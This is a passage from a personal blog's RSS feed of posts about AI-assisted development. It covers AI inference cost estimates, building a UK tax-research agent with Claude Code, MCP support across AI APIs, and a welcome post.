<p>We're still in the stone age of AI-assisted development. Current AI coding tools are like having a brilliant junior developer who's been blindfolded and can only communicate through grep and bash. Meanwhile, we have all these powerful analysis tools just sitting there, waiting to be connected.</p>
<p>The good news is that the integration is often trivial - most of these tools already have CLI interfaces or can output JSON. The building blocks are all there. We just need to connect them.</p>
<p>Until Claude Code and other AI assistants build in native support for static analysis, we can bridge the gap ourselves with simple scripts and documentation. But I'm optimistic that this is temporary - the productivity gains are too obvious to ignore.</p>
<p>I can really see a next-gen coding agent which has all the tooling that a fully featured IDE has (like IntelliJ or Visual Studio), instead of what we currently have which feels much more like VS Code.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/claude-code-static-analysis/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/claude-code-static-analysis/</guid>
      <pubDate>Mon, 01 Sep 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Are OpenAI and Anthropic Really Losing Money on Inference?</title>
      <description>Deconstructing the real costs of running AI inference at scale. My napkin math suggests the economics might be far more profitable than commonly claimed.</description>
      <content:encoded><![CDATA[<p>I keep hearing what a <a href="https://www.datacenterdynamics.com/en/news/openai-training-and-inference-costs-could-reach-7bn-for-2024-ai-startup-set-to-lose-5bn-report/">cash</a> <a href="https://www.wheresyoured.at/wheres-the-money/">incinerator</a> <a href="https://futurism.com/the-byte/openai-chatgpt-pro-subscription-losing-money">AI</a> is, especially around inference. While it seems reasonable on the surface, I've often been wary of these kind of claims, so I decided to do some digging.</p>
<p>I haven't seen anyone really try to deconstruct the costs in running inference at scale and the economics really interest me.</p>
<blockquote>
<p>This is really napkin math. I don't have any experience at running frontier models at scale, but I do know a lot about the costs and economics of running very high throughput services on the cloud and, also, some of the absolutely crazy margins involved from the hyperscalers vs bare metal. Corrections are most welcome.</p>
</blockquote>
<h2>Some assumptions</h2>
<p>I'm only going to look at raw compute costs. This is obviously a complete oversimplification, but given how useful the current models are - even assuming no improvements - I want to stress test the idea that everyone is losing so much money on inference that it is completely unsustainable.</p>
<p>I've taken the cost of a single H100 at $2/hour. This is actually more than the current retail rental on demand price, and I (hope) the large AI firms are able to get these for a fraction of this price.</p>
<p><img src="https://martinalderson.com/img/Pasted%20image%2020250827193941.png" alt="H100 pricing comparison"></p>
<p>Secondly, I'm going to use the architecture of DeepSeek R1 as the baseline, 671B total params with 37B active via mixture of experts. Given this gets somewhat similar performance to Claude Sonnet 4 and GPT5 I think it's a fair assumption to make.</p>
<h2>Working Backwards: H100 Math From First Principles</h2>
<h3>Production Setup</h3>
<p>Let's start with a realistic production setup. I'm assuming a cluster of 72 H100s at $2/hour each, giving us $144/hour in total costs.</p>
<p>For production latency requirements, I'm using a batch size of 32 concurrent requests per model instance, which is more realistic than the massive batches you might see in benchmarks. With tensor parallelism across 8 GPUs per model instance, we can run 9 model instances simultaneously across our 72 GPUs.</p>
<h4>Prefill Phase (Input Processing)</h4>
<p>The H100 has about 3.35TB/s of HBM bandwidth per GPU, which becomes our limiting factor for most workloads. With 37B active parameters requiring 74GB in FP16 precision, we can push through approximately 3,350GB/s ÷ 74GB = 45 forward passes per second per instance.</p>
<p>Here's the key insight: each forward pass processes ALL tokens in ALL sequences simultaneously. With our batch of 32 sequences averaging 1,000 tokens each, that's 32,000 tokens processed per forward pass. This means each instance can handle 45 passes/s × 32k tokens = 1.44 million input tokens per second. Across our 9 instances, we're looking at 13 million input tokens per second, or 46.8 billion input tokens per hour.</p>
<p>In reality, with MoE you might need to load different expert combinations for different tokens in your batch, potentially reducing throughput by 2-3x if tokens route to diverse experts. However, in practice, routing patterns often show clustering around popular experts, and modern implementations use techniques like expert parallelism and capacity factors to maintain efficiency, so the actual impact is likely closer to a 30-50% reduction rather than worst-case scenarios.</p>
<h4>Decode Phase (Output Generation)</h4>
<p>Output generation tells a completely different story. Here we're generating tokens sequentially - one token per sequence per forward pass. So our 45 forward passes per second only produce 45 × 32 = 1,440 output tokens per second per instance. Across 9 instances, that's 12,960 output tokens per second, or 46.7 million output tokens per hour.</p>
<h3>Raw Cost Per Token</h3>
<p>The asymmetry is stark: $144 ÷ 46,800M = $0.003 per million input tokens versus $144 ÷ 46.7M = $3.08 per million output tokens. That's a thousand-fold difference!</p>
<h3>When Compute Becomes the Bottleneck</h3>
<p>Our calculations assume memory bandwidth is the limiting factor, which holds true for typical workloads. But compute becomes the bottleneck in certain scenarios. With long context sequences, attention computation scales quadratically with sequence length. Very large batch sizes with more parallel attention heads can also shift you to being compute bound.</p>
<p>Once you hit 128k+ context lengths, the attention matrix becomes massive and you shift from memory-bound to compute-bound operation. This can increase costs by 2-10x for very long contexts.</p>
<p>This explains some interesting product decisions. Claude Code artificially limits context to 200k  tokens - not just for performance, but to keep inference in the cheap memory-bound regime and avoid expensive compute-bound long-context scenarios. This is also why providers charge extra for 200k+ context windows - the economics fundamentally change.</p>
<h2>Real-World User Economics</h2>
<p>So to summarise, I suspect the following is the case based on trying to reverse engineer the costs (and again, keep in mind this is retail rental prices for H100s):</p>
<ul>
<li><strong>Input processing is essentially free</strong> (~$0.001 per million tokens)</li>
<li><strong>Output generation has real costs</strong> (~$3 per million tokens)</li>
</ul>
<p>These costs map to what DeepInfra charges for R1 hosting, with the exception there is a much higher markup on input tokens.</p>
<p><img src="https://martinalderson.com/img/Pasted%20image%2020250827200246.png" alt="DeepInfra R1 pricing"></p>
<h3>A. Consumer Plans</h3>
<ul>
<li><strong>$20/month ChatGPT Pro user</strong>: Heavy daily usage but token-limited
<ul>
<li>100k toks/day</li>
<li>Assuming 70% input/30% output: actual cost ~$3/month</li>
<li>5-6x markup for OpenAI</li>
</ul>
</li>
</ul>
<p>This is your typical power user who's using the model daily for writing, coding, and general queries. The economics here are solid.</p>
<h3>B. Developer Usage</h3>
<ul>
<li><strong>Claude Code Max 5 user</strong> ($100/month): 2 hours/day heavy coding
<ul>
<li>~2M input tokens, ~30k output tokens/day</li>
<li>Heavy input token usage (cheap parallel processing) + minimal output</li>
<li>Actual cost: ~$4.92/month → 20.3x markup</li>
</ul>
</li>
<li><strong>Claude Code Max 10 user</strong> ($200/month): 6 hours/day very heavy usage
<ul>
<li>~10M input tokens, ~100k output tokens/day</li>
<li>Huge number of input tokens but relatively few generated tokens</li>
<li>Actual cost: ~$16.89/month → 11.8x markup</li>
</ul>
</li>
</ul>
<p>The developer use case is where the economics really shine. Coding agents like Claude Code naturally have a hugely asymmetric usage pattern - they input entire codebases, documentation, stack traces, multiple files, and extensive context (cheap input tokens) but only need relatively small outputs like code snippets or explanations. This plays perfectly into the cost structure where input is nearly free but output is expensive.</p>
<h3>C. API Profit Margins</h3>
<ul>
<li><strong>Current API pricing</strong>: $3/15 per million tokens vs ~$0.01/3 actual costs</li>
<li><strong>Margins</strong>: 80-95%+ gross margins</li>
</ul>
<p>The API business is essentially a money printer. The gross margins here are software-like, not infrastructure-like.</p>
<h2>Conclusion</h2>
<p>We've made a lot of assumptions in this analysis, and some probably aren't right. But even if you assume we're off by a factor of 3, the economics still look highly profitable. The raw compute costs, even at retail H100 pricing, suggest that AI inference isn't the unsustainable money pit that many claim it to be.</p>
<p>The key insight that most people miss is just how dramatically cheaper input processing is compared to output generation. We're talking about a thousand-fold cost difference - input tokens at roughly $0.005 per million versus output tokens at $3+ per million.</p>
<p>This cost asymmetry explains why certain use cases are incredibly profitable while others might struggle. Heavy readers - applications that consume massive amounts of context but generate minimal output - operate in an almost free tier for compute costs. Conversational agents, coding assistants processing entire codebases, document analysis tools, and research applications all benefit enormously from this dynamic.</p>
<p>Video generation represents the complete opposite extreme of this cost structure. A video model might take a simple text prompt as input - maybe 50 tokens - but needs to generate millions of tokens representing each frame. The economics become brutal when you're generating massive outputs from minimal inputs, which explains why video generation remains so expensive and why these services either charge premium prices or limit usage heavily.</p>
<p>The &quot;AI is unsustainably expensive&quot; narrative may be serving incumbent interests more than reflecting economic reality. When established players emphasize massive costs and technical complexity, it discourages competition and investment in alternatives. But if our calculations are even remotely accurate, especially for input-heavy workloads, the barriers to profitable AI inference may be much lower than commonly believed.</p>
<p>Let's not hype the costs up so much that people overlook the raw economics. I feel everyone fell for this a decade or two ago with cloud computing costs from the hyperscalers and allowed them to become money printers. If we're not careful we'll end up with the same on AI inference.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/are-openai-and-anthropic-really-losing-money-on-inference/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/are-openai-and-anthropic-really-losing-money-on-inference/</guid>
      <pubDate>Wed, 27 Aug 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>I gave Claude Code a folder of tax documents and used it as a professional tax agent</title>
      <description>Testing Claude Code beyond software engineering - using it as a tax agent to analyze documents and navigate complex tax scenarios in real-time.</description>
      <content:encoded><![CDATA[<p>Like many software engineers, I've really found Claude Code an amazing tool for doing a lot of the heavy lifting of software engineering.</p>
<p>I found many other tasks were easily done with Claude Code; almost by accident. I noticed it was great at updating copy in the project, and even updating privacy policies to include subprocessors based on what it knew about the project.</p>
<p>This then got me thinking: what if we used Claude Code for non-software development tasks?</p>
<blockquote>
<p>NB: I finished this blog just as Anthropic released the new <a href="https://docs.anthropic.com/en/docs/claude-code/output-styles">output styles feature</a>, which is aimed at this exact use case. I'll revisit this in a future article</p>
</blockquote>
<p>I had an idea to try and see how it would work with UK tax policy (this seemed like a fairly difficult space and regular LLMs struggle with it), and the UK tax documentation is mostly available on hmrc.gov.uk and legislation.gov.uk in a fairly easy to parse format.</p>
<h2>Step 1: Getting the tax legislation</h2>
<p>The first job was to grab the important tax legislation and the tax manuals from the gov.uk website. Using Claude Code I wrote a scraper in a few minutes that did a recursive search and downloaded all the legislation and the Corporation Tax and Personal Tax <a href="https://www.gov.uk/government/collections/hmrc-manuals">manuals</a> to a set of folders (there are a bunch of other manuals that we could extend this with, but this was just a starting point.</p>
<p>We now have ~10,000 documents for our agent to search through. This isn't complicated - it's just a huge folder of text documents. These text documents could be anything you want, it really is as simple as giving it access to a folder of 'information' that it can search through. It doesn't need to particularly well organised, though I suspect better results could be had through that.</p>
<h2>Step 2: Writing our claude.md file</h2>
<p>The <strong>CLAUDE.md</strong> file gives Claude Code the instructions on how to work. Typically in a software development environment you'd put stuff like what database you're working with, code style guidelines, etc. My idea was to reuse this but in a general way.</p>
<p>After a few iterations chatting with Claude Code itself to improve it I ended up with this kind of CLAUDE.md file:</p>
<pre><code class="language-##UK">
You are an expert UK tax professional capable of handling complex tax situations with comprehensive research and analysis. You will be run in agent mode to handle sophisticated tax queries from non-technical users.

## Your Knowledge Base

You have access to comprehensive UK tax documentation (9,769 individual sections across 11 specialist manuals):

- **HMRC Corporation Tax Manual (CTM)**: 700+ sections covering every aspect of corporation tax including complex corporate structures, international provisions, specialized reliefs, anti-avoidance rules, and technical computations

etc
</code></pre>
<p>I then added a section to create subagents to have multiple agents working in parallel</p>
<pre><code class="language-**Parallel">
   **Always launch multiple subagents in parallel** for comprehensive coverage:
   - **Corporate law agent**: Research corporate structures, distributions, purchase of own shares, capital reductions (CTM, Company Taxation manuals)
   - **Personal tax agent**: Research individual tax implications, dividend taxes, capital gains rates (Income Tax, Capital Gains manuals)
   - **Current rates agent**: Find current 2024-25/2025 tax rates, allowances, thresholds (all manuals + legislation)
   - **Anti-avoidance agent**: Research GAAR, specific anti-avoidance rules, compliance requirements (all relevant manuals)
   - **Legislative agent**: Research primary legislation, statutory provisions, recent changes (legislation directory)

etc
</code></pre>
<p>and finally added a section to let it know how to output the files:</p>
<pre><code class="language-##">
**For Primary Agent**: After providing your comprehensive tax analysis and answer, write the complete consolidated response to `output.md` using the Write tool.

**For Subagents**: Write your specific research findings to separate files based on your research area:
- **Corporate law agent**: Write to `research_corporate.md`
- **Personal tax agent**: Write to `research_personal.md`
- **Current rates agent**: Write to `research_rates.md`
- **Anti-avoidance agent**: Write to `research_antiavoidance.md`
- **Legislative agent**: Write to `research_legislation.md`
- **Other specialized agents**: Write to `research_[topic].md`

**Primary Agent Final Output Format** (`output.md`):
</code></pre>
<p>From this we now have a complete agent setup.</p>
<h2>Step 3: Testing</h2>
<p>Claude Code is (mostly) run in a terminal environment, which limits the accessibility of it for non-technical users. This is changing rapidly though, but for now we'll just do it old school.</p>
<p>I decided to test it on some <a href="https://www.att.org.uk/students/past-exam-papers">past exam papers</a> from the ATT (Association of Taxation Technicians). The ATT is a professional body for UK tax technicians, and their exams cover practical scenarios in personal and business taxation. These exams require knowledge of UK tax law and the ability to apply it to real-world situations - making them a good test for our AI tax agent.</p>
<p>You can see the question I asked in the screenshot below:</p>
<img src="https://martinalderson.com/img/tax-agent-att-exam-question.png" alt="ATT exam question showing tax residency scenarios" class="no-border">
It then goes away, creates a todo list for itself and starts researching: 
<img src="https://martinalderson.com/img/tax-agent-research-todo-list.png" alt="Claude Code creating a todo list and starting research" class="no-border">
After about 5 minutes, it then writes the output to a text file and gives a summary (the correct answer is above from the exam paper).
<p><img src="https://martinalderson.com/img/tax-agent-final-answer.png" alt="Final answer from the tax agent"></p>
<p>Looking at the full answer the agent gave, I'd give it 2.5 marks out of 3 (missing the UK or EEA state part for the Ltd company residency).</p>
<p>This compares very strongly to regular LLM use, with even Opus getting the first question completely wrong:</p>
<p><img src="https://martinalderson.com/img/regular-llm-wrong-answer.png" alt="Regular LLM getting the answer wrong"></p>
<h2>So what?</h2>
<p>I think this opens up a whole world of simple agents for anyone to make. It's literally just text files in a folder. While I don't really have a need for a tax agent, I can see this being very useful for anyone in professional services.</p>
<p>For example, you could put all of your contract and invoice documents in a folder, and ask it to cross reference contracts and invoices to spot mistakes or inconsistencies.</p>
<p>Or, for content writers, put your entire library of content in a folder and ask it to update links between them, or point out content that is old and needs updating given future articles you've written.</p>
<h2>The damn terminal</h2>
<p>The current drawback is that Claude Code requires a bit of technical knowledge to setup and run, and let's face it, terminal scares off 99% of users that aren't used to it.</p>
<p>But this is changing rapidly. The new output styles feature is a step in this direction, and I suspect we'll see more GUI-based solutions soon. The potential is too big for it to stay locked behind command line interfaces forever.</p>
<h2>What's Next?</h2>
<p>With Anthropic's new output styles feature specifically targeting non-development use cases, I suspect we'll see this pattern explode across professional services. The barrier to creating sophisticated AI agents just dropped to basically zero - if you can organize files and write clear instructions, you can build an expert system.</p>
<p>The real question isn't whether this will work for your domain, but how quickly you can get your knowledge base organized and start experimenting. In a world where AI capabilities are advancing rapidly, the competitive advantage goes to those who can most effectively combine domain expertise with AI tooling.</p>
<p>Time to start collecting those documents.</p>
<blockquote>
<p>I'd love to hear from anyone who's building AI agents in this way. <a href="https://martinalderson.com/contact">Feel free to contact me.</a></p>
</blockquote>
]]></content:encoded>
      <link>https://martinalderson.com/posts/building-a-tax-agent-with-claude-code/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/building-a-tax-agent-with-claude-code/</guid>
      <pubDate>Thu, 21 Aug 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Beyond the Hype: Real-World MCP Support Across Major AI APIs</title>
      <description>Testing Model Context Protocol support across OpenAI, Anthropic, and others. The reality of cross-platform MCP implementation in 2025.</description>
      <content:encoded><![CDATA[<p>MCP is probably the most exciting development in AI and software development I can remember. The ability to connect tools in a LLM-agnostic way so easily really opens an almost paralysing level of new opportunities. It also introduces a whole host of new potential security vulnerabilities (Simon Willson has an <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">excellent writeup</a> of the main one).</p>
<p>Recently, I feel I've went all in with Anthropic - upgrading the &quot;Max&quot; plan, using Claude Code daily, and using Claude.ai for most &quot;general&quot; LLM chat. Anthropic introduced MCP so it certainly makes sense that MCP (generally) works great inside Anthropic tools.</p>
<p>I was recently working on a small project for a friend and wanted to use MCPs within the standard LLM API workflow. Given the amount of hype around MCP, I assumed that the &quot;big 3&quot; (OpenAI, Google and Anthropic) had good support in their APIs, even if UI support was lagging a bit behind.</p>
<p>However, I didn't find this the case at all.</p>
<blockquote>
<p>Please note I didn't spend a huge amount of time looking into workarounds for this, so I may well have missed something, and by the time you read this it may be outdated.</p>
</blockquote>
<h2>Gemini API - no real MCP support</h2>
<p>I watched the recent Google I/O presentation and had mistakenly assumed that Gemini API at least had good support for MCP. Turns out I was quite wrong on this.</p>
<p>When you go to the MCP section of the documentation, you'll see this:
<img src="https://martinalderson.com/img/gemini-mcp-documentation.png" alt="Gemini MCP documentation showing limited support"></p>
<p>However, this isn't what I consider &quot;true&quot; MCP support. It just enumerates the MCP tools on the host that is running the LLM query and places them into the tool definition. It doesn't work the same way as the other providers, where the LLM provider itself discovers the tools <em>and runs them</em> from their side. This IMO is far preferable to doing all the lifting on your side calling them, as the round trips will quickly add up and overall feels very fragile.</p>
<p>Furthermore, it's only 'supported' in the Javascript and Python SDKs.</p>
<p>I was disappointed to see how poor this is given the excellent tool calling Gemini web UI can do with Google services.</p>
<h2>OpenAI API - Good approach, but couldn't get it working</h2>
<p>Next I moved on to OpenAI. OpenAI supports full remote MCP support where you can put a MCP URL in and it will do all the heavy lifting, and call the tools remotely.</p>
<p><img src="https://martinalderson.com/img/openai-mcp-support.png" alt="OpenAI MCP configuration interface">
Unfortunately, I couldn't get it working at all. I can see in the debug logs it discovers the remote tools (hosted using the streamable-http transport, with no auth required).</p>
<p>I just get the following error when trying to call my tools (which works fine with MCP Inspector, Claude and even direct JSON-RPC calls):</p>
<pre><code class="language-json">&quot;error&quot;: {
  &quot;type&quot;: &quot;mcp_protocol_error&quot;,
  &quot;code&quot;: 32600,
  &quot;message&quot;: &quot;Session terminated&quot;
},
</code></pre>
<p>So it looks promising, but doesn't work. I suspect more testing work needs to be done on it.</p>
<h2>Claude AI - (unsurprisingly) works out of the box</h2>
<p>Anthropic works out of the box, with a very similar approach. Tool calling works perfectly and it takes a few seconds to add existing remote MCP servers to a prompt - the experience I expected from the other providers.</p>
<p>The drawback with Claude is the price of their API, which while not a total apples to apples comparison, is a lot more expensive than Gemini 2.5 Flash, which is my preferred model for a lot of simpler use cases. Given how quickly MCP can consumer tokens this makes it hard to use for a lot of use cases.</p>
<h2>Conclusion</h2>
<p>I was surprised to see such a variation in support for MCP in the major providers LLMs. Anthropic, like in many other areas, is way ahead and (potentially) justifies their premium pricing - not because of their model capabilities - but because they make it so easy to use tooling with their products.</p>
<p>Hopefully this will change soon - but it's really surprising to me that Google and OpenAI have got so far behind on having a polished out of the box experience for developers with remote MCP servers.</p>
<p>This is a very similar story with coding agents, where Claude Code feels very far ahead of the Google and OpenAI alternatives. Again - not because of the model, but because the tool calling and management works so seamlessly.</p>
<p>Finally - I think there is a very big opening for someone that hosts open weights models like Qwen3 or (ironically) gpt-oss to deliver a very polished and slick MCP integration option on their hosted API endpoints. I haven't managed to come across one yet, but I'd love to test any - <a href="https://martinalderson.com/contact">feel free to reach out to me</a> if you'd like me to test it and I'm happy to update this blog with new providers.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/mcp-support-across-ai-apis/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/mcp-support-across-ai-apis/</guid>
      <pubDate>Fri, 15 Aug 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Welcome to My Blog</title>
      <description>Starting a blog about AI-assisted development, MCP integrations, and building production software with modern tooling like Claude Code and Cursor.</description>
      <content:encoded><![CDATA[<p>I've finally started a blog. This entire site was built with Claude Code in about an hour while watching TV, which feels fitting given what I want to write about.</p>
<p>I've been through multiple phases with LLMs over the past couple of years - from thinking they were mostly useless for real development work to now rarely opening my IDE. The tooling has got genuinely good, and it feels like we're at one of those inflection points where the way we build software changes fundamentally.</p>
<p>I figured I'd document some of the stuff I'm working on, particularly around web development with AI assistance, MCP (Model Context Protocol), and agentic workflows. Maybe it's useful for other people building similar things.</p>
<p>I'll be writing about:</p>
<ul>
<li>Real experiences building production software with Claude Code, Cursor, and similar tools</li>
<li>Working with MCP and tool integrations - this stuff is getting surprisingly powerful</li>
<li>Agentic workflows that actually deliver value (not just demos)</li>
<li>Performance optimization techniques when you have AI assistance</li>
<li>The intersection between commercial needs and technical execution</li>
</ul>
<p>Most of this will probably be outdated in 6 months given how fast things are moving, but documenting the journey seems worthwhile.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/welcome/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/welcome/</guid>
      <pubDate>Sun, 10 Aug 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    
  </channel>
</rss>